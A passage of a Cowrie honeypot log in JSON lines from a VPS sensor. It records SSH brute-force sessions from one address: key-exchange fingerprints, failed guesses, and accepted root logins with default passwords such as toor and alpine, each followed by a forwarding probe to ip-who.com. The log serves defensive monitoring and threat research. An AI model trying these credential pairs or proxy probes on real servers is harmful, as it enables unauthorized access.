a2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:03:25.395402Z","src_ip":"212.227.235.229","session":"03622200c586"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45032,"dst_ip":"1.2.3.4","dst_port":22,"session":"9f95c1bbaba1","protocol":"ssh","message":"New connection: 212.227.235.229:45032 (1.2.3.4:22) [session: 9f95c1bbaba1]","sensor":"my-vps","timestamp":"2025-08-28T08:03:26.550548Z"}
{"eventid":"cowrie.login.failed","username":"nikita","password":"nikita","message":"login attempt [nikita/nikita] failed","sensor":"my-vps","timestamp":"2025-08-28T08:03:26.556840Z","src_ip":"212.227.235.229","session":"03622200c586"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:03:26.557346Z","src_ip":"212.227.235.229","session":"9f95c1bbaba1"}
{"eventid":"cowrie.login.success","username":"root","password":"abcdefg","message":"login attempt [root/abcdefg] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:03:27.044477Z","src_ip":"212.227.235.229","session":"1c199d57f916"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-28T08:03:27.974310Z","session":"1c199d57f916"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T08:03:28.223729Z","src_ip":"212.227.235.229","session":"1c199d57f916"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:03:28.390744Z","src_ip":"212.227.235.229","session":"9f95c1bbaba1"}
{"eventid":"cowrie.login.failed","username":"username","password":"password","message":"login attempt [username/password] failed","sensor":"my-vps","timestamp":"2025-08-28T08:03:28.716581Z","src_ip":"212.227.235.229","session":"0d758873734e"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:03:28.722496Z","src_ip":"212.227.235.229","session":"1c199d57f916"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:03:29.272183Z","src_ip":"212.227.235.229","session":"03622200c586"}
{"eventid":"cowrie.login.success","username":"root","password":"alpine","message":"login attempt [root/alpine] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:03:29.960201Z","src_ip":"212.227.235.229","session":"9f95c1bbaba1"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-28T08:03:30.220012Z","session":"9f95c1bbaba1"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T08:03:30.483584Z","src_ip":"212.227.235.229","session":"9f95c1bbaba1"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:03:30.624344Z","src_ip":"212.227.235.229","session":"0d758873734e"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:03:30.747032Z","src_ip":"212.227.235.229","session":"9f95c1bbaba1"}
{"eventid":"cowrie.login.failed","username":"kim","password":"kim123","message":"login attempt [kim/kim123] failed","sensor":"my-vps","timestamp":"2025-08-28T08:03:30.975585Z","src_ip":"212.227.235.229","session":"6d3cc994b020"}
{"eventid":"cowrie.session.closed","duration":"16.9","message":"Connection lost after 16.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:03:32.375643Z","src_ip":"212.227.235.229","session":"6d3cc994b020"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35004,"dst_ip":"1.2.3.4","dst_port":22,"session":"80da110d6782","protocol":"ssh","message":"New connection: 212.227.235.229:35004 (1.2.3.4:22) [session: 80da110d6782]","sensor":"my-vps","timestamp":"2025-08-28T08:03:37.909269Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:03:37.931916Z","src_ip":"212.227.235.229","session":"80da110d6782"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:03:38.164932Z","src_ip":"212.227.235.229","session":"80da110d6782"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35020,"dst_ip":"1.2.3.4","dst_port":22,"session":"7044c280e083","protocol":"ssh","message":"New connection: 212.227.235.229:35020 (1.2.3.4:22) [session: 7044c280e083]","sensor":"my-vps","timestamp":"2025-08-28T08:03:38.336562Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:03:38.401975Z","src_ip":"212.227.235.229","session":"7044c280e083"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:03:38.600284Z","src_ip":"212.227.235.229","session":"7044c280e083"}
{"eventid":"cowrie.session.connect","src_ip":"155.4.118.11","src_port":58386,"dst_ip":"1.2.3.4","dst_port":23,"session":"7ae058df874f","protocol":"telnet","message":"New connection: 155.4.118.11:58386 (1.2.3.4:23) [session: 7ae058df874f]","sensor":"my-vps","timestamp":"2025-08-28T08:03:39.616333Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"trustix","message":"login attempt [admin/trustix] failed","sensor":"my-vps","timestamp":"2025-08-28T08:03:41.549559Z","src_ip":"212.227.235.229","session":"7044c280e083"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:03:44.027002Z","src_ip":"212.227.235.229","session":"7044c280e083"}
{"eventid":"cowrie.login.failed","username":"sshd","password":"sshd","message":"login attempt [sshd/sshd] failed","sensor":"my-vps","timestamp":"2025-08-28T08:03:47.616499Z","src_ip":"212.227.235.229","session":"80da110d6782"}
{"eventid":"cowrie.session.closed","duration":"11.0","message":"Connection lost after 11.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:03:48.869953Z","src_ip":"212.227.235.229","session":"80da110d6782"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58008,"dst_ip":"1.2.3.4","dst_port":22,"session":"c2824d406241","protocol":"ssh","message":"New connection: 212.227.235.229:58008 (1.2.3.4:22) [session: c2824d406241]","sensor":"my-vps","timestamp":"2025-08-28T08:03:51.714394Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:03:51.717095Z","src_ip":"212.227.235.229","session":"c2824d406241"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:03:52.199633Z","src_ip":"212.227.235.229","session":"c2824d406241"}
{"eventid":"cowrie.session.closed","duration":13.366485357284546,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:03:52.982727Z","src_ip":"155.4.118.11","session":"7ae058df874f"}
{"eventid":"cowrie.login.success","username":"root","password":"toor","message":"login attempt [root/toor] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:03:53.790600Z","src_ip":"212.227.235.229","session":"c2824d406241"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58016,"dst_ip":"1.2.3.4","dst_port":22,"session":"06735c5608be","protocol":"ssh","message":"New connection: 212.227.235.229:58016 (1.2.3.4:22) [session: 06735c5608be]","sensor":"my-vps","timestamp":"2025-08-28T08:03:53.961383Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:03:53.962681Z","src_ip":"212.227.235.229","session":"06735c5608be"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-28T08:03:54.042475Z","session":"c2824d406241"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T08:03:54.359404Z","src_ip":"212.227.235.229","session":"06735c5608be"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T08:03:54.371201Z","src_ip":"212.227.235.229","session":"c2824d406241"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:03:54.623501Z","src_ip":"212.227.235.229","session":"c2824d406241"}
{"eventid":"cowrie.login.failed","username":"test","password":"q1w2e3","message":"login attempt [test/q1w2e3] failed","sensor":"my-vps","timestamp":"2025-08-28T08:03:55.722629Z","src_ip":"212.227.235.229","session":"06735c5608be"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:03:57.068236Z","src_ip":"212.227.235.229","session":"06735c5608be"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36532,"dst_ip":"1.2.3.4","dst_port":22,"session":"eff03df05364","protocol":"ssh","message":"New connection: 212.227.235.229:36532 (1.2.3.4:22) [session: eff03df05364]","sensor":"my-vps","timestamp":"2025-08-28T08:03:58.462806Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T08:03:58.463778Z","src_ip":"212.227.235.229","session":"eff03df05364"}
